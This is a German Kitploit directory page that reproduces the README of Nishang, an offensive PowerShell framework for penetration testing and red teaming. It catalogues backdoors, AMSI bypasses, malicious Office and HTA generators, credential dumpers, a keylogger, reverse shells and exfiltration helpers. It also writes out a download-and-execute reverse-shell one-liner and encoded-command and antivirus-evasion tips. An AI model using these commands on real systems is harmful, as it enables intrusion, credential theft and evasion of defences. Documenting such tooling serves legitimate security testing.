Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
nishang — Nishang - Offensives PowerShell für Red Team, Penetrationstests und offensive Sicherheit. | Kitploit
Tools/GitHubGitHub/samratashok/nishang
Passwort-CrackingPhishing-ToolsPrivilege EscalationPayload-GenerierungExploitationLaterale BewegungDatenexfiltrationInformationsbeschaffungPost-ExploitationPenetrationstestsCommand and ControlRed Teaming
10.0k2.5kvor 3 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
GitHubsamratashok/nishang

nishang

Nishang - Offensives PowerShell für Red Team, Penetrationstests und offensive Sicherheit.

Repository anzeigen

Nishang

Nishang ist ein Framework und eine Sammlung von Skripten und Payloads, die die Nutzung von PowerShell für offensive Sicherheit, Penetrationstests und Red Teaming ermöglicht. Nishang ist in allen Phasen von Penetrationstests nützlich.

Von Nikhil Mittal Gründer von Altered Security - Praxisorientiertes Red Team und Enterprise-Sicherheitstraining!

Verwendung

Importieren Sie alle Skripte in die aktuelle PowerShell-Sitzung (PowerShell v3 und höher).

root@kitploit:~
PS C:\nishang> Import-Module .\nishang.psm1

Verwenden Sie die einzelnen Skripte mit Dot-Sourcing.

root@kitploit:~
PS C:\nishang> . C:\nishang\Gather\Get-Information.ps1

PS C:\nishang> Get-Information

Um Hilfe zu einem Skript oder einer Funktion zu erhalten, verwenden Sie:

root@kitploit:~
PS C:\nishang> Get-Help [scriptname] -full

Beachten Sie, dass die Hilfe ab Version 0.3.8 für die nach dem Ausführen des Skripts geladene Funktion und nicht für das Skript selbst verfügbar ist. In allen Fällen ist der Funktionsname identisch mit dem Skriptnamen.

Um beispielsweise die Hilfe zu Get-WLAN-Keys.ps1 anzuzeigen, verwenden Sie

root@kitploit:~
PS C:\nishang> . C:\nishang\Get-WLAN-Keys.ps1

PS C:\nishang> Get-Help Get-WLAN-Keys -Full

Antivirus

Nishang-Skripte werden von vielen Antivirenprogrammen als bösartig eingestuft. Die Skripte auf einem Ziel sollen im Arbeitsspeicher verwendet werden, was mit PowerShell sehr einfach ist. Zwei grundlegende Methoden zur Ausführung von PowerShell-Skripten im Arbeitsspeicher:

Methode 1. Verwenden Sie den In-Memory-Download und die Ausführung: Verwenden Sie den folgenden Befehl, um ein PowerShell-Skript von einer Remote-Shell, einer Meterpreter-Native-Shell, einer Webshell usw. auszuführen, sowie die von ihm exportierte Funktion. Alle Skripte in Nishang exportieren eine Funktion mit demselben Namen in der aktuellen PowerShell-Sitzung.

root@kitploit:~
powershell iex (New-Object Net.WebClient).DownloadString('http://<yourwebserver>/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress [IP] -Port [PortNo.]

Methode 2. Verwenden Sie den Parameter -encodedcommand (oder -e) von PowerShell Alle Skripte in Nishang exportieren eine Funktion mit demselben Namen in der aktuellen PowerShell-Sitzung. Stellen Sie daher sicher, dass der Funktionsaufruf im Skript selbst erfolgt, wenn Sie den Parameter encodedcommand von einer Nicht-PowerShell-Shell aus verwenden. Fügen Sie für obiges Beispiel einen Funktionsaufruf (ohne Anführungszeichen) "Invoke-PowerShellTcp -Reverse -IPAddress [IP] -Port [PortNo.]" hinzu.

Kodieren Sie das Skript mit Invoke-Encode aus Nishang:

root@kitploit:~
PS C:\nishang> . \nishang\Utility\Invoke-Encode

PS C:\nishang> Invoke-Encode -DataToEncode C:\nishang\Shells\Invoke-PowerShellTcp.ps1 -OutCommand

Kodierte Daten geschrieben nach .\encoded.txt

Kodierter Befehl geschrieben nach .\encodedcommand.txt

Verwenden Sie von oben das kodierte Skript aus encodedcommand.txt und führen Sie es auf einem Ziel aus, auf dem Befehle ausgeführt werden können (eine Remote-Shell, eine Meterpreter-Native-Shell, eine Webshell usw.). Verwenden Sie es wie folgt:

root@kitploit:~
C:\Users\target> powershell -e [encodedscript]

Falls die Skripte trotzdem erkannt werden, hilft es, die Funktions- und Parameternamen zu ändern und den Hilfetext zu entfernen.

Falls AMSI von Windows 10 die Skriptausführung weiterhin blockiert, siehe diesen Blog: http://www.labofapenetrationtester.com/2016/09/amsi.html

Skripte

Nishang enthält derzeit die folgenden Skripte und Payloads.

ActiveDirectory

Set-DCShadowPermissions

Ändert AD-Objekte, um minimale Berechtigungen für DCShadow bereitzustellen.

Antak - die Webshell

Antak

Führen Sie PowerShell-Skripte im Arbeitsspeicher aus, führen Sie Befehle aus und laden Sie Dateien mit dieser Webshell hoch und herunter.

Backdoors

HTTP-Backdoor

Ein Hintertürchen, das Anweisungen von Drittanbieter-Websites empfangen und PowerShell-Skripte im Arbeitsspeicher ausführen kann.

DNS_TXT_Pwnage

Ein Hintertürchen, das Befehle und PowerShell-Skripte aus DNS-TXT-Abfragen empfangen, auf einem Ziel ausführen und über die Abfragen ferngesteuert werden kann.

Execute-OnTime

Ein Hintertürchen, das PowerShell-Skripte zu einem bestimmten Zeitpunkt auf einem Ziel ausführen kann.

Gupt-Backdoor

Ein Hintertürchen, das Befehle und Skripte von einer WLAN-SSID empfangen kann, ohne sich mit ihr zu verbinden.

Add-ScrnSaveBackdoor

Ein Hintertürchen, das den Windows-Bildschirmschoner für die ferngesteuerte Befehls- und Skriptausführung nutzen kann.

Invoke-ADSBackdoor

Ein Hintertürchen, das alternative Datenströme und die Windows-Registrierung zur Persistenz nutzen kann.

Add-RegBackdoor

Ein Hintertürchen, das den bekannten Debugger-Trick verwendet, um Payloads mit Sticky Keys und Utilman (Windows-Taste + U) auszuführen.

Set-RemoteWMI

Ändert Berechtigungen von DCOM- und WMI-Namespaces, um einem nicht-administrativen Benutzer Zugriff zu gewähren.

Set-RemotePSRemoting

Ändert Berechtigungen der PowerShell-Remoteverwaltung, um einem nicht-administrativen Benutzer Zugriff zu gewähren.

Bypass

Invoke-AmsiBypass

Implementierung öffentlich bekannter Methoden zur Umgehung/Vermeidung von AMSI.

Client

Out-CHM

Erstellt infizierte CHM-Dateien, die PowerShell-Befehle und -Skripte ausführen können.

Out-Word

Erstellt Word-Dateien und infiziert vorhandene, um PowerShell-Befehle und -Skripte auszuführen.

Out-Excel

Erstellt Excel-Dateien und infiziert vorhandene, um PowerShell-Befehle und -Skripte auszuführen.

Out-HTA

Erstellt eine HTA-Datei, die auf einem Webserver bereitgestellt und in Phishing-Kampagnen verwendet werden kann.

Out-Java

Erstellt signierte JAR-Dateien, die mit Applets für Skript- und Befehlsausführung verwendet werden können.

Out-Shortcut

Erstellt Verknüpfungsdateien, die PowerShell-Befehle und -Skripte ausführen können.

Out-WebQuery

Erstellt IQY-Dateien für das Phishing von Anmeldeinformationen und SMB-Hashes.

Out-JS

Erstellt JS-Dateien, die PowerShell-Befehle und -Skripte ausführen können.

Out-SCT

Erstellt SCT-Dateien, die PowerShell-Befehle und -Skripte ausführen können.

Out-SCF

Erstellt eine SCF-Datei, die zum Erfassen von NTLM-Hash-Challenges verwendet werden kann.

Escalation

Enable-DuplicateToken

Wenn SYSTEM-Berechtigungen benötigt werden.

Remove-Update

Führt Schwachstellen ein, indem Patches entfernt werden.

Invoke-PsUACme

UAC umgehen.

Execution

Download-Execute-PS

Lädt ein PowerShell-Skript herunter und führt es im Arbeitsspeicher aus.

Download_Execute

Lädt eine ausführbare Datei im Textformat herunter, konvertiert sie in eine ausführbare Datei und führt sie aus.

Execute-Command-MSSQL

Führt PowerShell-Befehle, systemeigene Befehle oder SQL-Befehle auf einem MSSQL-Server mit ausreichenden Berechtigungen aus.

Execute-DNSTXT-Code

Führt Shellcode im Arbeitsspeicher mithilfe von DNS-TXT-Abfragen aus.

Out-RundllCommand

Führt PowerShell-Befehle und -Skripte oder eine reverse PowerShell-Sitzung mit rundll32.exe aus.

Gather

Check-VM

Prüft auf eine virtuelle Maschine.

Copy-VSS

Kopiert die SAM-Datei mithilfe des Volumenschattenkopie-Dienstes.

Invoke-CredentialsPhish

Täuscht einen Benutzer, sodass er Anmeldeinformationen im Klartext preisgibt.

FireBuster FireListener

Ein Paar von Skripten für Egress-Tests.

Get-Information

Sammelt wertvolle Informationen von einem Ziel.

Get-LSASecret

Ruft LSA-Geheimnisse von einem Ziel ab.

Get-PassHashes

Ruft Passwort-Hashes von einem Ziel ab.

Get-WLAN-Keys

Ruft WLAN-Schlüssel im Klartext von einem Ziel ab.

Keylogger

Zeichnet Tastatureingaben von einem Ziel auf.

Invoke-MimikatzWdigestDowngrade

Gibt Benutzerkennwörter im Klartext unter Windows 8.1 und Server 2012 aus.

Get-PassHints

Ruft Kennworthinweise von Windows-Benutzern von einem Ziel ab.

Show-TargetScreen

Stellt eine Verbindung zurück und streamt den Zielbildschirm mit MJPEG.

Invoke-Mimikatz

Lädt Mimikatz in den Arbeitsspeicher. Aktualisiert und mit einigen Anpassungen.

Invoke-Mimikittenz

Extrahiert wertvolle Informationen aus dem Arbeitsspeicher von Zielprozessen (wie Browsern) mithilfe von Regex.

Invoke-SSIDExfil

Exfiltriert Informationen wie Benutzeranmeldeinformationen mithilfe der WLAN-SSID.

Invoke-SessionGopher

Identifiziert Admin-Sprungboxen und/oder Computer, die für den Zugriff auf Unix-Maschinen verwendet werden.

MITM

Invoke-Interceptor

Ein lokaler HTTPS-Proxy für MITM-Angriffe.

Pivot

Create-MultipleSessions

Überprüft Anmeldeinformationen auf mehreren Computern und erstellt PSSessions.

Run-EXEonRemote Kopiert und führt eine ausführbare Datei auf mehreren Computern aus.

Invoke-NetworkRelay Erstellt Netzwerk-Relays zwischen Computern.

Prasadhak

Prasadhak

Überprüft die Hashes laufender Prozesse gegen die VirusTotal-Datenbank.

Scan

Brute-Force

Brute-Force für FTP, Active Directory, MSSQL und Sharepoint.

Port-Scan

Ein praktischer Portscanner.

Powerpreter

Powerpreter

Die gesamte Funktionalität von Nishang in einem einzigen Skriptmodul.

Shells

Invoke-PsGcat

Sendet Befehle und Skripte an ein bestimmtes Gmail-Konto, die von Invoke-PsGcatAgent ausgeführt werden sollen.

Invoke-PsGcatAgent

Führt von Invoke-PsGcat gesendete Befehle und Skripte aus.

Invoke-PowerShellTcp

Eine interaktive PowerShell-Reverse-Connect- oder Bind-Shell

Invoke-PowerShellTcpOneLine

Abgespeckte Version von Invoke-PowerShellTcp. Enthält auch eine Skelettversion, die in zwei Tweets passen könnte.

Invoke-PowerShellTcpOneLineBind

Bind-Version von Invoke-PowerShellTcpOneLine.

Invoke-PowerShellUdp

Eine interaktive PowerShell-Reverse-Connect- oder Bind-Shell über UDP

Invoke-PowerShellUdpOneLine

Abgespeckte Version von Invoke-PowerShellUdp.

Invoke-PoshRatHttps

Reverse interaktives PowerShell über HTTPS.

Invoke-PoshRatHttp

Reverse interaktives PowerShell über HTTP.

Remove-PoshRat

Bereinigt das System nach der Verwendung von Invoke-PoshRatHttps

Invoke-PowerShellWmi

Interaktives PowerShell mithilfe von WMI.

Invoke-PowerShellIcmp

Eine interaktive PowerShell-Reverse-Shell über ICMP.

Invoke-JSRatRundll

Eine interaktive PowerShell-Reverse-Shell über HTTP mit rundll32.exe.

Invoke-JSRatRegsvr

Eine interaktive PowerShell-Reverse-Shell über HTTP mit regsvr32.exe.

Utility

Add-Exfiltration

Fügt jedem Skript die Fähigkeit zur Datenexfiltration über Gmail, Pastebin, einen Webserver und DNS hinzu.

Add-Persistence

Fügt einem Skript die Fähigkeit zur Persistenz nach einem Neustart hinzu.

Remove-Persistence

Entfernt die Persistenz, die vom Add-Persistence-Skript hinzugefügt wurde.

Do-Exfiltration

Leiten Sie (|) die Ausgabe an jedes Skript weiter, um sie zu exfiltrieren.

Download

Überträgt eine Datei zum Ziel.

Parse_Keys

Analysiert die vom Keylogger aufgezeichneten Tastenanschläge.

Invoke-Encode

Kodiert und komprimiert ein Skript oder einen String.

Invoke-Decode

Dekodiert und dekomprimiert ein Skript oder einen String von Invoke-Encode.

Start-CaptureServer

Startet einen Webserver, der Basic Authentication und SMB-Hashes protokolliert.

ConvertTo-ROT13

Kodiert einen String in ROT13 oder dekodiert einen ROT13-String.

Out-DnsTxt

Generiert DNS-TXT-Einträge, die mit anderen Skripten verwendet werden können.

[Base64ToString]

[StringToBase64]

[ExetoText]

[TexttoExe]

Updates

Updates zu Nishang finden Sie in meinem Blog http://labofapenetrationtester.com und auf meinem Twitter-Feed @nikhil_mitt.

Fehler, Feedback und Funktionsanfragen

Bitte erstellen Sie ein Issue, wenn Sie einen Fehler finden oder eine Funktionsanfrage haben. Sie können mich unter nikhil [dot] uitrgpv at gmail.com kontaktieren.

Mailing-Liste

Für Feedback, Diskussionen und Funktionsanfragen treten Sie bei: http://groups.google.com/group/nishang-users

Mitwirken

Ich bin immer auf der Suche nach Mitwirkenden für Nishang. Bitte reichen Sie Anfragen ein oder senden Sie mir eine E-Mail.

Blogbeiträge

Einige hilfreiche Blogbeiträge für Einsteiger:

http://www.labofapenetrationtester.com/2014/06/nishang-0-3-4.html

http://labofapenetrationtester.com/2012/08/introducing-nishang-powereshell-for.html

http://labofapenetrationtester.com/2013/08/powerpreter-and-nishang-Part-1.html

http://www.labofapenetrationtester.com/2013/09/powerpreter-and-nishang-Part-2.html

Alle Beiträge über Nishang:

http://www.labofapenetrationtester.com/search/label/Nishang

Tool herunterladen